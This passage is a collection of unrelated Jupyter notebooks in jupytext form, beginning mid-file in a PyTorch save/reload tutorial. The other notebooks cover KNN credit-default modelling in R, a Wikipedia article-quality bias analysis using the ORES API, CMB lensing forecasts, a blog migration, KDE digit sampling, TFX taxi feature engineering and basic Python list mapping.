        torch.nn.Linear(1, 10),
        torch.nn.ReLU(),
        torch.nn.Linear(10, 1)
    )
    # copy net1's parameters into net3
    net3.load_state_dict(torch.load('net_params.pkl'))
    prediction = net3(x)

    # plot result
    plt.subplot(133)
    plt.title('Net3')
    plt.scatter(x.data.numpy(), y.data.numpy())
    plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)
    plt.show()

# save net1
save()
# restore entire net (may slow)
restore_net()
# restore only the net parameters
restore_params()
tutorial-contents-notebooks/304_save_reload.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # plotting $\sigma_{\rm log \mathcal{M}_*}(\mathcal{M}_h = 10^{12} M_\odot)$ as a function of $t_{duty}$ # + import numpy as np import catalog as Cat import evolver as Evol import observables as Obvs import util as UT import matplotlib.pyplot as plt # %matplotlib inline # -
centralms/notebooks/notes_siglogMstar_tduty.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .r
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: R
#     name: ir
# ---

# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/jmeche/scikit-learn/blob/master/UCI_Credit_KNN.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# +
install.packages("caret")
install.packages("tidyverse")
install.packages("FNN")
install.packages("stringr")

# +
install.packages("e1071")
library(e1071)

# +
# library() loads a single package per call: library(caret, tidyverse)
# silently loaded only caret (the second argument is `help`), so tidyverse
# was never attached. Load each package explicitly.
library(caret)
library(tidyverse)
library(FNN)
library(stringr)

# +
getwd()

# +
df <- read.csv("UCI_Credit_Card.csv")

# + [markdown]
# # Data Cleaning

# +
dim(df)
str(df)

# +
# Drop the ID column; it is only a row identifier.
df <- df[, -1]
# Sex, Education, Marriage, Default and the PAY_X columns are categorical;
# they could be converted to factors later.
summary(df)

# +
any(is.na(df))  # No NA values

# +
# Rename the outcome variable to something more manageable,
# and title-case the demographic column names for readability.
names(df)[names(df) == "default.payment.next.month"] <- "Default"
for (i in seq(2, 5)) {
  names(df)[i] <- str_to_title(names(df)[i])
}

# +
# According to the data description Education takes values 1 to 4
# (1 = graduate school; 2 = university; 3 = high school; 4 = others),
# but the data also contains 0, 5 and 6. Count the rows at each level.
# (sum(df$Education == k) counts rows directly; the previous trick of
# summing the values and dividing by k cannot work for k = 0.)
sum(df$Education == 0)  # 14 entries
sum(df$Education == 1)  # 10585
sum(df$Education == 2)  # 14030
sum(df$Education == 3)  # 4917
sum(df$Education == 4)  # 123
sum(df$Education == 5)  # 280
sum(df$Education == 6)  # 51
# Recode the 345 undocumented levels (0, 5, 6) as "others" (4).
df$Education[df$Education == 0 | df$Education == 5 | df$Education == 6] <- 4
summary(df)

# +
# Marital status should be 1 = married, 2 = single, 3 = others;
# recode the undocumented 0's as 3 ("others").
df$Marriage[df$Marriage == 0] <- 3
summary(df)

# +
# The repayment-status columns are documented as -1, 1, ..., 9 but the data
# actually ranges from -2 to 8. Count how frequent the undocumented codes are.
sum(df$PAY_0 == -2)
sum(df$PAY_0 == -1)
sum(df$PAY_0 == 0)

# +
# Rename PAY_0 to PAY_1 so the columns run PAY_1..PAY_6 consistently.
names(df)[match("PAY_0", names(df))] <- "PAY_1"

# +
# Probably "no payment delay" should be 0, so bump every repayment-status
# column up by 1 and then collapse the resulting -1's into 0 as well.
pay_cols <- seq(match("PAY_1", names(df)), match("PAY_6", names(df)))
for (i in pay_cols) {
  df[, i] <- df[, i] + 1
}
for (i in pay_cols) {
  df[, i][df[, i] == -1] <- 0
}

# +
# Only the outcome is converted to a factor for now; predictors stay
# numeric so the distance-based KNN functions below can use them directly.
df$Default <- as.factor(df$Default)

# + [markdown]
# # Split in Train and Test

# +
trainIndex <- createDataPartition(df$Default, times = 1, p = 0.8, list = FALSE)
df_train <- df[trainIndex, ]
df_test <- df[-trainIndex, ]

# + [markdown]
# # KNN with built-in function

# +
# FNN::knn() takes the predictors and the class labels separately.
df_train_knn <- df_train[, -24]
df_test_knn <- df_test[, -24]
default_train <- df_train$Default
default_test <- df_test$Default

# +
model <- knn(df_train_knn, df_test_knn, cl = default_train, k = 155)

# +
str(model)
table(model, default_test)

# +
err.rate <- mean(model != default_test)
err.rate
Acc <- 1 - err.rate
Acc

# +
# Sweep k over a high range and record the test error rate for each.
save.pred <- data.frame()
for (K in 135:175) {
  pred <- knn(df_train_knn, df_test_knn, cl = default_train, k = K)
  error.rate <- mean(pred != default_test)
  save.pred <- rbind(save.pred, data.frame(error.rate, K))
}
save.pred

# +
plot(save.pred$K, save.pred$error.rate)

# +
# Same sweep over low k.
save.pred.lowk <- data.frame()
for (K in 1:40) {
  pred <- knn(df_train_knn, df_test_knn, cl = default_train, k = K)
  error.rate <- mean(pred != default_test)
  save.pred.lowk <- rbind(save.pred.lowk, data.frame(error.rate, K))
}
save.pred.lowk

# +
plot(save.pred.lowk$K, save.pred.lowk$error.rate)

# +
# And over a medium range of k.
save.pred.medk <- data.frame()
for (K in 41:80) {
  pred <- knn(df_train_knn, df_test_knn, cl = default_train, k = K)
  error.rate <- mean(pred != default_test)
  save.pred.medk <- rbind(save.pred.medk, data.frame(error.rate, K))
}
save.pred.medk

# +
plot(save.pred.medk$K, save.pred.medk$error.rate)

# +
# Best k in each of the three sweeps.
save.pred.lowk[which.min(save.pred.lowk$error.rate), ]
save.pred.medk[which.min(save.pred.medk$error.rate), ]
save.pred[which.min(save.pred$error.rate), ]

# + [markdown]
# Looks like the best k would be k = 30

# + [markdown]
# # KNN in Caret

# +
fitControl10 <- trainControl(
  method = "repeatedcv",  # 10-fold CV
  number = 10,
  repeats = 10            # repeated ten times
)
tune_grid <- expand.grid(k = 150:160)

# +
str(tune_grid)

# +
# Train a cross-validated KNN with centred and scaled predictors.
# (A previous revision trained the model twice -- once without the CV
# control, only to overwrite it immediately -- and never used tune_grid;
# both issues are fixed by this single call.)
caret.knn.cv10 <- train(Default ~ ., data = df_train,
                        method = "knn",
                        trControl = fitControl10,
                        tuneGrid = tune_grid,
                        preProcess = c('center', 'scale'))

# +
# Evaluate on the held-out test set. Accuracy / the confusion matrix is the
# appropriate metric for a factor outcome; RMSE (used in a previous,
# broken cell that referenced the undefined objects `caret.knn` and
# `dfsmall_test`) does not apply to classification.
caret.pred <- predict(caret.knn.cv10, newdata = df_test)
confusionMatrix(caret.pred, df_test$Default)

# +
# varImp(caret.knn.cv10)
# Function can be used with caret, but not with the previous model.
# When it works with caret this will be very useful
UCI_Credit_KNN.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3 (ipykernel)
#     language: python
#     name: python3
# ---

import numpy as np
import pandas as pd

# # Read the CSV Files

page_data = pd.read_csv("../data/page_data.csv")
page_data.head()

population = pd.read_csv("../data/WPDS_2020_data - WPDS_2020_data.csv")
population.head()

# # Data Processing

# The page_data contains some page names that start with the string "Template:". These pages are not Wikipedia articles, and should not be included in the analysis.

# Filter out the data with page names starting with "Template:"
page_data = page_data[~page_data['page'].str.startswith('Template:')]
# Reset the index
page_data.reset_index(drop=True, inplace=True)
page_data.head()

# WPDS_2020_data.csv contains some rows that provide cumulative regional population counts, rather than country-level counts. These rows are distinguished by having ALL CAPS values in the 'geography' field (e.g. AFRICA, OCEANIA). These rows won't match the country values in page_data.csv.

# Get the population of countries. (Excluding cumulative regional counts)
population_country = population[population['Type'] == 'Country']
population_country.reset_index(drop=True, inplace=True)
population_country.head()

# # Obtain article quality

# Now you need to get the predicted quality scores for each article in the Wikipedia dataset. We're using a machine learning system called ORES. This was originally an acronym for "Objective Revision Evaluation Service" but was simply renamed "ORES". ORES is a machine learning tool that can provide estimates of Wikipedia article quality. The article quality estimates are, from best to worst:
#
# FA - Featured article
# GA - Good article
# B - B-class article
# C - C-class article
# Start - Start-class article
# Stub - Stub-class article
#
# These were learned based on articles in Wikipedia that were peer-reviewed using the Wikipedia content assessment procedures. These quality classes are a sub-set of quality assessment categories developed by Wikipedia editors. For this assignment, you only need to know that these categories exist, and that ORES will assign one of these 6 categories to any rev_id you send it.
#
# In order to get article predictions for each article in the Wikipedia dataset, you will first need to read page_data.csv into Python (or R), and then read through the dataset line by line, using the value of the rev_id column to make an API query.

# Obtain rev_ids as a list
rev_ids = page_data['rev_id'].tolist()

# +
import requests

headers = {
    'User-Agent': 'https://github.com/azhou5211',
    'From': '<EMAIL>'
}

def api_call(endpoint, rev_id):
    """Call the ORES API for one revision id and return the parsed JSON.

    :param endpoint: API URL template containing a ``{rev_id}`` placeholder
    :param rev_id: revision id to score
    :return: decoded JSON response as a dict
    """
    call = requests.get(endpoint.format(rev_id=rev_id), headers=headers)
    response = call.json()
    return response
# -

request_url = 'https://ores.wikimedia.org/v3/scores/enwiki/{rev_id}/articlequality'

# Get the article quality for each wikipedia article.
article_quality = []
for rev_id in rev_ids:
    response = api_call(request_url, rev_id)
    try:
        pred = response['enwiki']['scores'][str(rev_id)]['articlequality']['score']['prediction']
    except (KeyError, TypeError):
        # ORES returns an error payload without a 'score' key for revisions
        # it cannot score; record those as missing. (A bare ``except:`` here
        # would also swallow KeyboardInterrupt and real bugs.)
        pred = np.nan
    article_quality.append(pred)

# Add the article quality into the pages dataframe
page_data['quality'] = article_quality
page_data.head()

# List of wikipedia pages that did not have a predicted quality from ORES
page_data[page_data['quality'].isna()]

page_data[page_data['quality'].isna()].to_csv("Non-Predicted ORES pages.csv", index=False)

# Filter the page_data to include only the values that have a predicted quality
page_data_filtered = page_data[~page_data['quality'].isna()]
page_data_filtered

# # Combining the datasets

# Merge the wikipedia data and population data together.
# Both have fields containing country names for just that purpose. After merging the data, you'll invariably run into entries which cannot be merged. Either the population dataset does not have an entry for the equivalent Wikipedia country, or vice versa.

df = page_data_filtered.merge(population_country, left_on='country', right_on='Name', how='left')
df

# Filter to only the relevant columns
df = df[['country','page','rev_id','quality','Population']]
df.rename(columns={'page':'article_name','rev_id':'revision_id','quality':'article_quality_est.','Population':'population'}, inplace=True)
df

# Filter the rows that do not have data and output it to
# ```wp_wpds_countries-no_match.csv```
df[df['population'].isna()].to_csv("../output_files/wp_wpds_countries-no_match.csv", index=False)
df[df['population'].isna()]

# Filter the df to contain non null values. Output the dataframe to ```wp_wpds_politicians_by_country.csv```
df = df[~df['population'].isna()]
df.to_csv("../output_files/wp_wpds_politicians_by_country.csv", index=False)
df

# # Analysis

# Calculate the proportion (as a percentage) of articles-per-population and high-quality articles for each country AND for each geographic region.
# By "high quality" articles, in this case we mean the number of articles about politicians in a given country that ORES predicted would be in either the "FA" (featured article) or "GA" (good article) classes.

# Count ALL politician articles per country (this drives the coverage
# metric) and carry each country's population along.
df_analysis_country = df.groupby('country').agg({'article_quality_est.': 'count', 'population': 'first'})
df_analysis_country.rename(columns={'article_quality_est.': 'total_count'}, inplace=True)

# Count the high-quality (FA or GA) articles per country and attach the
# counts. Countries with no FA/GA article keep an explicit 0 instead of
# silently dropping out of the analysis (as happened when the groupby was
# run only on the filtered frame).
df_analysis = df[(df['article_quality_est.'] == 'FA') | (df['article_quality_est.'] == 'GA')]
hq_counts = df_analysis.groupby('country').agg({'article_quality_est.': 'count'})
hq_counts.rename(columns={'article_quality_est.': 'count_of_high_quality'}, inplace=True)
df_analysis_country = df_analysis_country.merge(hq_counts, how='left', left_index=True, right_index=True)
df_analysis_country['count_of_high_quality'] = df_analysis_country['count_of_high_quality'].fillna(0).astype(int)

# Coverage: ALL politician articles as a share of the population.
# (A previous revision divided the high-quality count by population here,
# which contradicts the metric's definition above.)
df_analysis_country['percentage_of_articles-per-population'] = df_analysis_country['total_count'] / df_analysis_country['population']

# Relative quality: share of a country's articles that are FA/GA.
df_analysis_country['percentage_of_high-quality_articles'] = df_analysis_country['count_of_high_quality'] / df_analysis_country['total_count']
df_analysis_country

# # Results

# ### Top 10 countries by coverage: 10 highest-ranked countries in terms of number of politician articles as a proportion of country population
df_analysis_country.sort_values(by=['percentage_of_articles-per-population'], ascending=False).head(10)

# ### Bottom 10 countries by coverage: 10 lowest-ranked countries in terms of number of politician articles as a proportion of country population
df_analysis_country.sort_values(by=['percentage_of_articles-per-population']).head(10)

# ### Top 10 countries by relative quality: 10 highest-ranked countries in terms of the relative proportion of politician articles that are of GA and FA-quality
df_analysis_country.sort_values(by=['percentage_of_high-quality_articles'], ascending=False).head(10)

# ### Bottom 10 countries by relative quality: 10 lowest-ranked countries in terms of the relative proportion of politician articles that are of GA and FA-quality
df_analysis_country.sort_values(by=['percentage_of_high-quality_articles']).head(10)

# Obtain the regions from the population dataframe

# +
region = "NORTHERN AFRICA"
# NOTE(review): assumes the first three rows of the WPDS file are WORLD,
# AFRICA and NORTHERN AFRICA (true of the 2020 layout); every following
# row inherits the most recent Sub-Region above it.
regions = ['WORLD', 'AFRICA', 'NORTHERN AFRICA']
for i in range(3, len(population)):
    if population.iloc[i]['Type'] == 'Sub-Region':
        region = population.iloc[i]['Name']
    regions.append(region)
# -

population['Region'] = regions
population

df_analysis_country.reset_index(inplace=True)

# Merge the region with analysis
df_analysis_country_ = df_analysis_country.merge(population[['Name', 'Region']], left_on='country', right_on='Name', how='left')
df_analysis_country_.drop(columns=['Name'], inplace=True)
df_analysis_country_

# Groupby region and sum the article counts
df_analysis_region = df_analysis_country_.groupby('Region').agg({'count_of_high_quality':'sum','total_count':'sum'})
df_analysis_region

# Merge the population value
population_region = population[population['Type']=='Sub-Region']
df_analysis_region_ = df_analysis_region.merge(population_region[['Name', 'Population']], left_index=True, right_on='Name')
df_analysis_region_

# Coverage and relative quality per region. Coverage again uses ALL
# articles over population, matching the definition in the headings below.
df_analysis_region_['percentage_of_articles-per-population'] = df_analysis_region_['total_count'] / df_analysis_region_['Population']
df_analysis_region_['percentage_of_high-quality_articles'] = df_analysis_region_['count_of_high_quality'] / df_analysis_region_['total_count']
df_analysis_region_ = df_analysis_region_[['Name', 'percentage_of_articles-per-population', 'percentage_of_high-quality_articles']]
df_analysis_region_.rename(columns={'Name':'Region'}, inplace=True)
df_analysis_region_

# ### Geographic regions by coverage: Ranking of geographic regions (in descending order) in terms of the total count of politician articles from countries in each region as a proportion of total regional population
df_analysis_region_.sort_values(by=['percentage_of_articles-per-population'], ascending=False)

# ### Geographic regions by relative quality: Ranking of geographic regions (in descending order) in terms of the relative proportion of politician articles from countries in each region that are of GA and FA-quality
df_analysis_region_.sort_values(by=['percentage_of_high-quality_articles'], ascending=False)
notebooks/hcds-a2-bias.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 2
#     language: python
#     name: python2
# ---

# %load_ext autoreload
# %autoreload 2

from __future__ import print_function
import numpy as np
from orphics import lensing,io,stats,cosmology,maps

# +
# Initialize cosmology and Clkk. Later parts need dimensionless spectra.
lmax = 3000
cc = cosmology.Cosmology(lmax=lmax,pickling=True,dimensionless=True)
theory = cc.theory
ells = np.arange(2,lmax,1)
# CMB lensing convergence power spectrum C_ell^{kappa kappa}.
clkk = theory.gCl('kk',ells)
pl = io.Plotter(yscale='log')
pl.add(ells,clkk)
pl.done()
# -

# Make a map template for calculating the noise curve on
# (5 deg wide patch at 1.5 arcmin pixel resolution).
shape,wcs = maps.rect_geometry(width_deg = 5.,px_res_arcmin=1.5)

# Define bin edges for noise curve
bin_edges = np.arange(80,2100,20)
nlgen = lensing.NlGenerator(shape,wcs,theory,bin_edges,lensedEqualsUnlensed=True)

# Experiment parameters, here for Planck
# NOTE(review): beam presumably in arcmin and noise in uK-arcmin; a 1.5'
# beam with 1 uK' noise looks more like a next-generation experiment than
# Planck -- confirm against the NlGenerator documentation.
beam = 1.5
noiseT = 1.
noiseP = 1.4
tellmin = 100
tellmax = 3000
pellmin = 100
pellmax = 3000
kmin = 20
kmax = 3000
# Quadratic-estimator polarization combinations to combine iteratively.
polCombs = ['TT','TE','EE','EB','TB']
_,_,_,_ = nlgen.updateNoise(beamX=beam,noiseTX=noiseT,noisePX=noiseP,tellminX=tellmin,tellmaxX=tellmax,pellminX=pellmin,pellmaxX=pellmax)
ls,nls,bells,nlbb,efficiency = nlgen.getNlIterative(polCombs,kmin,kmax,tellmax,pellmin,pellmax,verbose=True,plot=False)

# The result is noise curve nls defined at bin centers ls
pl = io.Plotter(yscale='log')
pl.add(ells,clkk)
pl.add(ls,nls,ls='--')
pl._ax.set_ylim(1.e-9,1.e-5)
pl.done()

# +
# Per-multipole errors from a Knox-formula covariance.
LF = cosmology.LensForecast()
LF.loadKK(ells,clkk,ls,nls)
lmin = 2
lmax = 3000
dell = 1
ellBinEdges = np.arange(lmin,lmax,dell)
lcents = (ellBinEdges[1:]+ellBinEdges[:-1])/2.
# 500./41250 is the sky fraction f_sky of a 500 sq. deg. survey
# (full sky ~ 41,253 sq. deg.).
var, sigs1, sigs2 = LF.KnoxCov("kk","kk",ellBinEdges,500./41250)
print(np.sqrt(sigs1))
pl = io.Plotter()
pl.add(lcents,np.sqrt(sigs1))
pl.done()
# +
# Signal-to-noise as a function of the lowest multipole kept (fixed lmax),
# then as a function of the highest multipole kept (fixed lmin).
LF = cosmology.LensForecast()
LF.loadKK(ells,clkk,ls,nls)
lminfid = 100
lmaxfid = 500
dell = 10
sns = []
lmins = np.arange(2,lminfid,dell)
for lmin in lmins:
    ellBinEdges = np.arange(lmin,lmaxfid,dell)
    sn,errs = LF.sn(ellBinEdges,500./41250.,"kk")
    sns.append(sn)
pl = io.Plotter()
pl.add(lmins,sns)
pl.done()

sns = []
lmaxs = np.arange(lmaxfid,3000,dell)
for lmax in lmaxs:
    ellBinEdges = np.arange(lminfid,lmax,dell)
    sn,errs = LF.sn(ellBinEdges,500./41250.,"kk")
    sns.append(sn)
pl = io.Plotter()
pl.add(lmaxs,sns)
pl.done()
# -
tutorials/Lensing-noise-curves-SN.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # WordPress to Fastpages
# > Converting wordpress blogs to fastpages

# I'm testing out fastpages - a great new tool that (among other things) lets you write blog posts in Jupyter and host them for free using Github pages. This post documents how I moved my past blog posts across from wordpress (datasciencecastnet.home.blog) into fastpages.
#
# ## The Steps
#
# These are the basic steps I followed:
#
# - Set up a fastpages repository by following the instructions (https://fastpages.fast.ai/fastpages/jupyter/2020/02/21/introducing-fastpages.html)
# - Export XML from wordpress. I used the standard process, Tools -> Export -> Export All (https://wordpress.org/support/article/tools-export-screen/) to get an XML file that contains all my posts etc.
# - Convert the XML export to markdown. I used https://github.com/lonekorean/wordpress-export-to-markdown. I had to install npm with ‘sudo apt install npm’ and then I placed my XML file in the same folder as the script and ran ‘npx wordpress-export-to-markdown’, following the prompts to create files with the right date format. I chose not to place them in separate folders, and didn’t save images scraped from the post body since this caused an error. You can drop these markdown files into the `_posts` folder of your fastpages repository - they'll appear as soon as it finishes building!
#
# Some optional extra steps to deal with images:
#
# - Export the media from my wordpress. The markdown files link to images hosted by wordpress, but these seem to load really slowly. Exporting the images and saving them in a 'wordpress_export' folder within the 'images' folder of the fastpages blog lets you have full control over the images and hosting.
# - Change the image references in the markdown posts.
There are various ways you could do this, but since this post is a jupyter notebook let's do it with a bit of python code! # # + # Get a list of posts import glob posts = glob.glob('../_posts/*.md') # replace the image URLs to point to our new images for post in posts: s = open(post, 'r').read() s = s.replace('https://datasciencecastnethome.files.wordpress.com', '{{ site.baseurl }}/images/wordpress_export') f = open(post, 'w') f.write(s) f.close() # - # Push your changes, and wait a few minutes for the build process to finish. Then check out your shiny new blog!
_notebooks/2020-02-25-wordpress-export.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# %matplotlib inline

# # Kernel Density Estimation
#
# This example shows how kernel density estimation (KDE), a powerful
# non-parametric density estimation technique, can be used to learn
# a generative model for a dataset. With this generative model in place,
# new samples can be drawn. These new samples reflect the underlying model
# of the data.

# +
import numpy as np
import matplotlib.pyplot as plt

from sklearn.datasets import load_digits
from sklearn.neighbors import KernelDensity
from sklearn.decomposition import PCA
from sklearn.model_selection import GridSearchCV

# load the data
digits = load_digits()
data = digits.data

# project the 64-dimensional data to a lower dimension
# (the KDE is fit and sampled in this 15-dimensional PCA space)
pca = PCA(n_components=15, whiten=False)
data = pca.fit_transform(digits.data)

# use grid search cross-validation to optimize the bandwidth
# (GridSearchCV uses its default cross-validation scheme here)
params = {'bandwidth': np.logspace(-1, 1, 20)}
grid = GridSearchCV(KernelDensity(), params)
grid.fit(data)

print("best bandwidth: {0}".format(grid.best_estimator_.bandwidth))

# use the best estimator to compute the kernel density estimate
kde = grid.best_estimator_

# sample 44 new points from the data, then map them back to pixel space
new_data = kde.sample(44, random_state=0)
new_data = pca.inverse_transform(new_data)

# turn data into a 4x11 grid
new_data = new_data.reshape((4, 11, -1))
real_data = digits.data[:44].reshape((4, 11, -1))

# plot real digits and resampled digits:
# rows 0-3 show real digits, row 4 is a hidden spacer,
# rows 5-8 show the KDE-generated digits
fig, ax = plt.subplots(9, 11, subplot_kw=dict(xticks=[], yticks=[]))
for j in range(11):
    ax[4, j].set_visible(False)
    for i in range(4):
        im = ax[i, j].imshow(real_data[i, j].reshape((8, 8)),
                             cmap=plt.cm.binary, interpolation='nearest')
        im.set_clim(0, 16)  # digits pixel intensities range 0-16
        im = ax[i + 5, j].imshow(new_data[i, j].reshape((8, 8)),
                                 cmap=plt.cm.binary, interpolation='nearest')
        im.set_clim(0, 16)

ax[0, 5].set_title('Selection from the input data')
ax[5, 5].set_title('"New" digits drawn from the kernel density model')

plt.show()
scikit-learn-official-examples/neighbors/plot_digits_kde_sampling.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 2
#     language: python
#     name: python2
# ---

# # Step 4: Feature Engineering
#
# Use the code below to run TensorFlow Transform on some example data using the schema from your pipeline. Start by importing and opening the metadata store.

# +
from __future__ import print_function
import os
import tempfile
import pandas as pd
import tfx_utils
import tensorflow_transform as tft
from tensorflow_transform import beam as tft_beam
from tfx.utils import io_utils
from tensorflow_metadata.proto.v0 import schema_pb2

# For DatasetMetadata boilerplate
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from tensorflow_transform.tf_metadata import schema_utils


def _make_default_sqlite_uri(pipeline_name):
    # Airflow-based TFX deployments keep the ML Metadata SQLite DB at this
    # conventional path under the user's home directory.
    return os.path.join(os.environ['HOME'], 'airflow/tfx/metadata', pipeline_name, 'metadata.db')


def get_metadata_store(pipeline_name):
    # Read-only handle onto the pipeline's ML Metadata store.
    return tfx_utils.TFXReadonlyMetadataStore.from_sqlite_db(_make_default_sqlite_uri(pipeline_name))


pipeline_name = 'taxi'
pipeline_db_path = _make_default_sqlite_uri(pipeline_name)
print('Pipeline DB:\n{}'.format(pipeline_db_path))
store = get_metadata_store(pipeline_name)
# -

# Get the schema URI from the metadata store

# Get the schema URI from the metadata store
# (exactly one SCHEMA artifact is expected in this pipeline's store)
schemas = store.get_artifacts_of_type_df(tfx_utils.TFXArtifactTypes.SCHEMA)
assert len(schemas.URI) == 1
schema_uri = schemas.URI.iloc[0] + 'schema.pbtxt'
print ('Schema URI:\n{}'.format(schema_uri))

# Get the schema that was inferred by TensorFlow Data Validation
schema_proto = io_utils.parse_pbtxt_file(file_name=schema_uri, message=schema_pb2.Schema())
feature_spec, domains = schema_utils.schema_as_feature_spec(schema_proto)
legacy_metadata = dataset_metadata.DatasetMetadata(dataset_schema.from_feature_spec(feature_spec, domains))

# Define features and create functions for TensorFlow Transform

# +
# Need to re-import because currently taxi_utils.py imports as `transform` not `tft`
import tensorflow_transform as transform
import tensorflow as tf

# Categorical features are assumed to each have a maximum value in the dataset.
_MAX_CATEGORICAL_FEATURE_VALUES = [24, 31, 12]

_CATEGORICAL_FEATURE_KEYS = [
    'trip_start_hour', 'trip_start_day', 'trip_start_month',
    'pickup_census_tract', 'dropoff_census_tract', 'pickup_community_area',
    'dropoff_community_area'
]

_DENSE_FLOAT_FEATURE_KEYS = ['trip_miles', 'fare', 'trip_seconds']

# Number of buckets used by tf.transform for encoding each feature.
_FEATURE_BUCKET_COUNT = 10

_BUCKET_FEATURE_KEYS = [
    'pickup_latitude', 'pickup_longitude', 'dropoff_latitude',
    'dropoff_longitude'
]

# Number of vocabulary terms used for encoding VOCAB_FEATURES by tf.transform
_VOCAB_SIZE = 1000

# Count of out-of-vocab buckets in which unrecognized VOCAB_FEATURES are hashed.
_OOV_SIZE = 10

_VOCAB_FEATURE_KEYS = [
    'payment_type',
    'company',
]

# Keys
_LABEL_KEY = 'tips'
_FARE_KEY = 'fare'


def _transformed_name(key):
    # Suffix convention marking a post-transform feature.
    return key + '_xf'


def _transformed_names(keys):
    return [_transformed_name(key) for key in keys]


def _fill_in_missing(x):
    """Replace missing values in a SparseTensor.

    Fills in missing values of `x` with '' or 0, and converts to a dense
    tensor.

    Args:
      x: A `SparseTensor` of rank 2.  Its dense shape should have size at most 1
        in the second dimension.

    Returns:
      A rank 1 tensor where missing values of `x` have been filled in.
    """
    default_value = '' if x.dtype == tf.string else 0
    # NOTE(review): tf.sparse_to_dense is TF1-era API (removed in TF2 in
    # favor of tf.sparse.to_dense) -- this notebook targets the TF1/TFT
    # versions pinned by the workshop environment.
    return tf.squeeze(
        tf.sparse_to_dense(x.indices, [x.dense_shape[0], 1], x.values,
                           default_value),
        axis=1)


def preprocessing_fn(inputs):
    """tf.transform's callback function for preprocessing inputs.

    Args:
      inputs: map from feature keys to raw not-yet-transformed features.

    Returns:
      Map from string feature key to transformed feature operations.
    """
    outputs = {}
    for key in _DENSE_FLOAT_FEATURE_KEYS:
        # Preserve this feature as a dense float, setting nan's to the mean.
        outputs[_transformed_name(key)] = transform.scale_to_z_score(
            _fill_in_missing(inputs[key]))

    for key in _VOCAB_FEATURE_KEYS:
        # Build a vocabulary for this feature.
        outputs[_transformed_name(key)] = transform.compute_and_apply_vocabulary(
            _fill_in_missing(inputs[key]),
            top_k=_VOCAB_SIZE,
            num_oov_buckets=_OOV_SIZE)

    for key in _BUCKET_FEATURE_KEYS:
        outputs[_transformed_name(key)] = transform.bucketize(
            _fill_in_missing(inputs[key]), _FEATURE_BUCKET_COUNT)

    for key in _CATEGORICAL_FEATURE_KEYS:
        outputs[_transformed_name(key)] = _fill_in_missing(inputs[key])

    # Was this passenger a big tipper?
    taxi_fare = _fill_in_missing(inputs[_FARE_KEY])
    tips = _fill_in_missing(inputs[_LABEL_KEY])
    # Label is 1 when the tip exceeded 20% of the fare; NaN fares map to 0.
    outputs[_transformed_name(_LABEL_KEY)] = tf.where(
        tf.is_nan(taxi_fare),
        tf.cast(tf.zeros_like(taxi_fare), tf.int64),
        # Test if the tip was > 20% of the fare.
        tf.cast(
            tf.greater(tips, tf.multiply(taxi_fare, tf.constant(0.2))),
            tf.int64))

    return outputs
# -

# Display the results of transforming some example data

from IPython.display import display
with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
    raw_examples = [
        {
            "fare": [100.0],
            "trip_start_hour": [12],
            "pickup_census_tract": ['abcd'],
            "dropoff_census_tract": [12345.0],  # No idea why this is a float
            "company": ['taxi inc.'],
            "trip_start_timestamp": [123456],
            "pickup_longitude": [12.0],
            "trip_start_month": [5],
            "trip_miles": [8.0],
            "dropoff_longitude": [12.05],
            "dropoff_community_area": [123],
            "pickup_community_area": [123],
            "payment_type": ['visa'],
            "trip_seconds": [600.0],
            "trip_start_day": [12],
            "tips": [10.0],
            "pickup_latitude": [80.0],
            "dropoff_latitude": [80.01],
        }
    ]
    # Run the analyze+transform phases over the in-memory examples using
    # the schema loaded above.
    (transformed_examples, transformed_metadata), transform_fn = (
        (raw_examples, legacy_metadata)
        | 'AnalyzeAndTransform' >> tft_beam.AnalyzeAndTransformDataset(
            preprocessing_fn))
    display(pd.DataFrame(transformed_examples))
notebooks/step4.ipynb
# ---
# title: "Apply Operations Over Items In A List"
# author: "<NAME>"
# date: 2017-12-20T11:53:49-07:00
# description: "Apply Operations Over Items In A List"
# type: technical_note
# draft: false
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# ## Method 1: map()

# Create a list of casualties from battles
battleDeaths = [482, 93, 392, 920, 813, 199, 374, 237, 244]


# Create a function that updates all battle deaths by adding 100
def updated(x):
    """Return the casualty count ``x`` increased by 100."""
    return x + 100


# Create a list that applies updated() to all elements of battleDeaths
list(map(updated, battleDeaths))

# ## Method 2: for x in y

# Create a list of deaths
casualties = [482, 93, 392, 920, 813, 199, 374, 237, 244]

# Create a variable where we will put the updated casualty numbers
casualtiesUpdated = []

# Loop that, for each item in casualties, adds 100
# (the original comment said "adds 10", which did not match the code)
for x in casualties:
    casualtiesUpdated.append(x + 100)

# View casualties variables
casualtiesUpdated

# ## Method 3: lambda functions

# Map the lambda function x() over casualties
list(map((lambda x: x + 100), casualties))
docs/python/basics/apply_operations_over_items_in_lists.ipynb
